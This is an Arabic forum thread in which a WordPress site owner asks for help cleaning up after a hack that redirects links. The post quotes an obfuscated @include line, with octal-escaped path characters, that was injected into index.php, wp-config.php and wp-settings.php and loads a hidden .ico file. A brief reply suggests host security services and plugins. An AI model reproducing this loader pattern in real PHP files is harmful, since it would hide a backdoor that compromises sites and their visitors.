• 0

تنظيف ووردبريس بعد الاختراق وسد الثغرات

سلامات جميعاً

انا استخدم ووردبريس على استضافة بلوهوست وقمت بربط 10 دومينات على هذا الحساب، من فترة اكتشفت عملية اختراق تقوم بتحويل روابط المواقع الى مواقع متعددة.

قمت بتحديث جميع الاضافات البرمجية وحذف الاكواد الموجودة ضمن الملفات، لكن بعد عدة ايام عند المراجعة وجدت انه تم استبدال العديد من الملفات بملفات اخرى فيها الكود التالي:

/*dc84b*/

@include "\057h\157m\*********\143/\160u\142l\151c\137h\164m\154/\167p\055i\156c\154u\144e\163/\122e\161u\145s\164s\057.\067e\0700\1418\062b\056i\143o";

/*dc84b*/

الملفات المستبدلة:

index.php

wp-config.php

wp-settings.php

بعد فك التشفير وجد ملف بعنوان .7e80a82b.ico لم استطيع فك التشفير حتى اتمكن من مشاهدة محتوياته.

سؤالي هو كيف اقوم بمنع حدوث هذا الأمر مرة اخرى ارجو منكم المساعدة مع العلم انه يوجد على الاستضافة اكتر من 10 نسخ ووردبريس منصبة ويتم العمل عليها.

الصورة المرفقة لمحتوى ملف .7e80a82b.ico

 

Capture.JPG

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

تحياتى

Hosting Company

سواء كانت بلو هوست او جودادى او هوست جاتور

بتوفر لك الحماية لكن بمقابل زيادة عن الهوستنج العادى

وراسل الدعم الفنى

هيفيدك أكتر

والورد بريس فيه بلج أن كتيرة بتساعدك على حماية موقعك

بالتوفيق

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة

يجب أن تكون عضوًا لدينا لتتمكّن من التعليق

انشاء حساب جديد

يستغرق التسجيل بضع ثوان فقط


سجّل حسابًا جديدًا

تسجيل الدخول

تملك حسابا مسجّلا بالفعل؟


سجّل دخولك الآن